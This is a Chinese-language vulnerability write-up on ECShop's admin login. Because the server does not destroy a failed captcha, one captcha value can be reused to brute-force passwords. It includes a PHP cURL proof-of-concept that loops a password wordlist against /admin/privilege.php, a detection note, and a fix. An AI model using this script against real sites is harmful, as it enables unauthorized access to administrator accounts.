ecshop绕过验证码暴力破解
验证码校验不匹配时,服务端并没有销毁当前验证码。
因此只需请求一次验证码图片,只要之后不再刷新验证码,这个验证码就可以一直重复使用。
1.获取正确的验证码
2.使用同一验证码重复提交登录请求,示例脚本如下:
<?php
// Proof-of-concept from the write-up: it shows that one captcha value, fetched
// once, is accepted again on every following login request because the server
// does not discard the captcha after a failed comparison.
//
// This listing is an excerpt: $site and $ch are used below but are not defined
// anywhere in it.
//
// Defender note: server-side, this pattern appears as a series of act=signin
// POSTs to /admin/privilege.php that carry the same captcha value while the
// password changes on each request. The fix given on the page is to destroy
// the captcha stored in the session once it has been checked.

// Path of the admin login endpoint, appended to $site below.
$admin_path = '/admin/privilege.php' ;
// Placeholder string ("the captcha obtained in the previous step"); the same
// value is sent with every request.
$captcha = '上一步获取的验证码' ;
$referer = $site ;

/**
 * Send one HTTP request through the global cURL handle $ch and return the body.
 *
 * @param string $url      Target URL.
 * @param array  $postdata Form fields; when non-empty they are URL-encoded and
 *                         set as CURLOPT_POSTFIELDS.
 * @return string|bool|null The curl_exec() result when the response code is 200.
 *                          For any other non-empty code the function prints the
 *                          code plus the submitted username/password and falls
 *                          off the end without a return value.
 *
 * Terminates the script with die() when curl_getinfo() reports no HTTP code.
 */
function getH( $url , $postdata = array ()){
    global $ch , $referer ;
    $options = array (
        CURLOPT_URL => $url ,
        CURLOPT_HEADER => false,
        CURLOPT_TIMEOUT=> 0.11,
        //CURLOPT_FILE=>$f,
        CURLOPT_RETURNTRANSFER=>true,
        CURLOPT_REFERER=> $referer ,
        //CURLOPT_POST=>1,
        CURLOPT_HTTPHEADER=> array (
            'Content-Type: application/x-www-form-urlencoded; charset=iso-8859-1' ,
            'Expect:'
        ),
        CURLOPT_USERAGENT=> 'ie'
    );
    // Only attach a request body when form fields were supplied.
    if (! empty ( $postdata )){
        $options [CURLOPT_POSTFIELDS]=http_build_query( $postdata );
    }
    // The result of curl_setopt_array() is overwritten by curl_exec() below
    // and is never inspected.
    $ret = curl_setopt_array( $ch , $options );
    //$ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);// return the response as a string instead of printing it directly
    $ret = curl_exec( $ch );
    $info = curl_getinfo( $ch );
    if ( empty ( $info [ 'http_code' ])) {
        die ( "No HTTP code was returned" );
    } else if ( $info [ 'http_code' ]==200) { // response code is 200
        return $ret ;
    } else {
        #var_dump( $info );
        echo '<br />' ;
        // The literal below is the label "response code:".
        echo ( '响应码:' . $info [ 'http_code' ]);
        // echo '<br />' ;
        echo $postdata [ 'username' ]. ' ---' . $postdata [ 'password' ];
        echo '<br />' ;
    }
}

$url = $site . $admin_path ;
// Login form fields; 'password' is replaced on each loop iteration, while
// 'captcha' stays the same for every request.
$data = array (
    'username' => 'admin' ,
    'password' => '123456ad' ,
    'captcha' => $captcha ,
    'act' => 'signin'
);
// wordlist
$passwds = array ( '1' , '2' , '3' , '123456a' , '123456' , '123456ds' );
foreach ( $passwds as $p ){
    $data [ 'password' ]= $p ;
    // Tags are stripped from the response before the text search.
    $res = strip_tags (getH( $url , $data ));
    // Prints 'no' when stripos() returns a truthy offset for the message
    // "the account information you entered is incorrect".
    if ( stripos ( $res , '您输入的帐号信息不正确' )){
        echo 'no' ;
    }
    echo '<br>------------------------<br>' ;
}
修复方案:
每次校验验证码之后(无论是否匹配),立即销毁 session 中的验证码,使每个验证码只能使用一次。此外建议对连续登录失败的次数加以限制。